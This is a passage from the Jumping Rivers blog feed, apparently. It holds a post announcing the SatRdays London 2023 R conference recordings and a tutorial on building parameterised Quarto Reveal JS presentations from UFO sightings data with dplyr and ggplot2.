&lt;/p&gt;</description></item><item><title>SatRdays London 2023 - Recordings</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2023-r-conference-recordings/</link><pubDate>Thu, 27 Jul 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2023-r-conference-recordings/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2023-r-conference-recordings/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2023-r-conference-recordings/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The recordings from this year&amp;rsquo;s SatRdays London conference are here! Over the next couple of weeks, we will be releasing the recordings of some of the excellent talks from the conference!&lt;/p&gt;
&lt;p&gt;You&amp;rsquo;ll be able to find them all in &lt;a href="https://www.youtube.com/playlist?list=PLbARZQfpqIKLNjt5NnVQ1RgEKeayVVv6G" rel="external"&gt;this playlist&lt;/a&gt; as they&amp;rsquo;re released, and keep an eye on our Twitter feed to see them as they come out.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-satrdays-london-2023-r-conference-recordings"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;p&gt;As a quick reminder, here&amp;rsquo;s a list of talks from the event:&lt;/p&gt;
&lt;h3 id="speakers"&gt;Speakers&lt;/h3&gt;
&lt;h4 id="keynote-speakers"&gt;Keynote Speakers&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Julia Silge (&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;): &lt;em&gt;What is &amp;ldquo;production&amp;rdquo; anyway? MLOps for the curious&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Oliver Hawkins (&lt;a href="https://www.ft.com/" rel="external"&gt;Financial Times&lt;/a&gt;): &lt;em&gt;Why R is good for journalism&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="contributed-talks"&gt;Contributed Talks&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Botan Ağın &amp;amp; Michael Stevens (&lt;a href="https://samknows.com/" rel="external"&gt;SamKnows&lt;/a&gt;): &lt;em&gt;AutRmatic reporting: billions of internet measurements, hundreds of reports and one repository to rule them all&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Vyara Apostolova &amp;amp; Laura Cole (&lt;a href="https://www.nao.org.uk/" rel="external"&gt;National Audit Office&lt;/a&gt;): &lt;em&gt;ScRutinising government spending&lt;/em&gt; (not recorded)&lt;/li&gt;
&lt;li&gt;Andrew Collier (&lt;a href="https://www.fathomdata.dev/" rel="external"&gt;Fathom Data&lt;/a&gt;): &lt;em&gt;Sidekicks of the Tidyverse&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Jack Davison (&lt;a href="https://www.ricardo.com/en/services/environmental-consulting" rel="external"&gt;Ricardo Energy &amp;amp; Environment&lt;/a&gt;): &lt;em&gt;“Put it on a map!” – Developments in Air Quality Data Analysis&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Russ Hyde (&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;): &lt;em&gt;Does code quality even matter in data science?&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Ella Kaye &amp;amp; Heather Turner (&lt;a href="https://warwick.ac.uk/" rel="external"&gt;University of Warwick&lt;/a&gt;): &lt;em&gt;Sustainability and EDI (Equality, Diversity and Inclusion) in the R Project&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="sponsors"&gt;Sponsors&lt;/h3&gt;
&lt;p&gt;Huge thanks again to all of the event sponsors, in particular CUSP London, who provided the venue and AV support, which allowed us to share these with you.&lt;/p&gt;
&lt;img src="cusp-london-logo.png" alt="CUSP London logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;img src="jr-logo-dark.png" alt="Jumping Rivers logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;img src="posit-logo.png" alt="Posit logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;img src="r-consortium-logo.png" alt="R Consortium logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2023-r-conference-recordings/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Generate multiple presentations with Quarto parameters</title><link>https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/</link><pubDate>Thu, 20 Jul 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Parameterised reporting is a powerful technique that allows you to
create dynamic and customisable reports by incorporating user-defined
parameters. These parameters act as placeholders that can be easily
modified to generate tailored reports based on specific inputs or
conditions, enabling seamless updates to reports without the need for
manual modifications. &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt;, a modern and
flexible document generation tool, provides excellent support for
parameterised reporting.&lt;/p&gt;
&lt;p&gt;In this blog, we will be looking at a Quarto &lt;a href="https://quarto.org/docs/presentations/revealjs/" rel="external"&gt;Reveal
JS&lt;/a&gt; presentation as an
example. By defining parameters within a Quarto presentation, you can
easily add flexibility and interactivity to your presentations, allowing
you to tailor the content to the specific needs or preferences of your
audience.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-r-parameterised-presentations-quarto"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="creating-a-reveal-js-presentation"&gt;Creating a Reveal JS presentation&lt;/h3&gt;
&lt;p&gt;You can easily create a Reveal JS presentation in RStudio with
&lt;code&gt;File &amp;gt; New File &amp;gt; Quarto Presentation &amp;gt; Reveal JS&lt;/code&gt;. This will create a
Quarto file (let’s call it &lt;code&gt;slides.qmd&lt;/code&gt;) as usual. We are going to be
using a slightly modified version of the
&lt;a href="https://github.com/rfordatascience/tidytuesday/tree/master" rel="external"&gt;TidyTuesday&lt;/a&gt;
data set on &lt;a href="https://github.com/rfordatascience/tidytuesday/blob/master/data/2023/2023-06-20/readme.md" rel="external"&gt;UFO
sightings&lt;/a&gt;.
The CSV file for the data set is available on our
&lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/2023-r-parameterised-presentations-quarto" rel="external"&gt;GitHub&lt;/a&gt;.
In this data set, we have information on UFO sightings between 2019 and
2022 from different US states.&lt;/p&gt;
&lt;p&gt;We will update the YAML for our presentation to add a title as well as
update the theme to make it look a little bit nicer.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;UFO Sightings&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;format&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;revealjs&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;theme&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;simple&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We’ll also add some general package-loading and data-reading code to the
top of our presentation.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ufo_sightings.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s say we wanted to include a histogram of UFO sighting durations in
our presentation. For Idaho in 2022, the code would look something like
this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_subset &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2022&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; state_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Idaho&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;to create a subset of the full UFO sighting data set and then:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_subset &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; duration_seconds)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_histogram&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#c74a4a&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Duration (seconds)&amp;#34;&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_x_continuous&lt;/span&gt;(labels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; scales&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;comma_format&lt;/span&gt;()) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;to create the histogram itself. We can then add this to a slide of our
presentation and add the heading “Sighting duration”.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Bar chart of duration of sightings in seconds." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/sighting-duration.png" width="1517"&gt;
Now, what if we wanted to create this plot for another state-year
combination? This is where parameters come in.&lt;/p&gt;
&lt;h3 id="using-parameters-in-quarto"&gt;Using parameters in Quarto&lt;/h3&gt;
&lt;p&gt;To add parameters to your Quarto document or presentation, you need to
use the &lt;code&gt;params&lt;/code&gt; option in the YAML. We want to be able to generate our
report flexibly with different combinations of US state and year, so we
will create a parameter for each of them. We will use Idaho and 2022 as
the default values for these parameters.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;UFO Sightings&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;format&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;revealjs&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;theme&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;simple&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;params&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;state&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Idaho&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;year&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2022&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;These parameters are then stored in the &lt;code&gt;params&lt;/code&gt; list accessible from
within your presentation. We can now update our earlier code to
rely on &lt;code&gt;params$year&lt;/code&gt; and &lt;code&gt;params$state&lt;/code&gt; instead of the
hard-coded year and state.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_subset &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; state_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;state
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, our plot will automatically update each time we re-generate the
presentation with different parameters.&lt;/p&gt;
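&lt;p&gt;One thing to watch for is a parameter combination that matches no rows, which would leave the slide with an empty plot. As a minimal sketch, you could fail early before filtering. The helper name &lt;code&gt;check_params()&lt;/code&gt; and the toy data frame are our own illustration and are not part of Quarto or the original slides; the column names &lt;code&gt;year&lt;/code&gt; and &lt;code&gt;state_name&lt;/code&gt; are the ones used in the filter above.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: stop early if the requested state/year is not in the data.
# Assumes the data has the columns `year` and `state_name`.
check_params = function(data, state, year) {
  # States that have at least one sighting in the requested year
  states_in_year = data$state_name[which(data$year == year)]
  if (!(state %in% states_in_year)) {
    stop("No sightings found for ", state, " in ", year, call. = FALSE)
  }
  invisible(TRUE)
}

# Toy data standing in for ufo_sightings
toy = data.frame(
  year = c(2021, 2022, 2022),
  state_name = c("Alabama", "Idaho", "Ohio")
)

# Passes silently; asking for Idaho in 2021 would raise an error instead
check_params(toy, state = "Idaho", year = 2022)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the slides themselves, the equivalent call would be something like &lt;code&gt;check_params(ufo_sightings, params$state, params$year)&lt;/code&gt;, placed just before the filtering step.&lt;/p&gt;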
&lt;p&gt;Before we go through how to render the presentation with values
other than the defaults, let’s also add a &lt;code&gt;subtitle&lt;/code&gt; to
the presentation which will change as the parameters change. So,
something like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;UFO Sightings&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;subtitle&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;`r params$state`, `r params$year`&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;format&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;revealjs&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;theme&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;simple&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;params&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;state&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Idaho&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;year&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2022&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="render-with-parameters"&gt;Render with parameters&lt;/h3&gt;
&lt;p&gt;To render our presentation with different parameters, we have a few
different options.&lt;/p&gt;
&lt;p&gt;If you prefer to render your presentation using an R function, you can
use &lt;code&gt;quarto::quarto_render()&lt;/code&gt; to do so. You’ll just
need to provide the &lt;code&gt;input&lt;/code&gt; .qmd file, as well as a list of the
parameters with the &lt;code&gt;execute_params&lt;/code&gt; argument. So, if you wanted to
generate the presentation for Alabama in 2021 this time, your command
would look something like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;quarto&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;quarto_render&lt;/span&gt;(input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;slides.qmd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; execute_params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2021&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;state&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Alabama&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="Screenshot of title page of presentation that reads “UFO Sightings: Alabama, 2021”" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/presentation-title.png" width="1177"&gt;&lt;/p&gt;
&lt;p&gt;If you’d rather render your presentation from the command line, you can
also easily do so with the &lt;code&gt;quarto render&lt;/code&gt; command paired with the &lt;code&gt;-P&lt;/code&gt;
parameter flag.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;quarto render slides.qmd -P year:2021 -P state:&lt;span style="color:#a5d6ff"&gt;&amp;#34;Alabama&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can also supply a YAML file of key:value pairings when rendering
your presentation with parameters. Simply create a file called
&lt;code&gt;params.yml&lt;/code&gt;, and define your parameters. To change the parameters for a
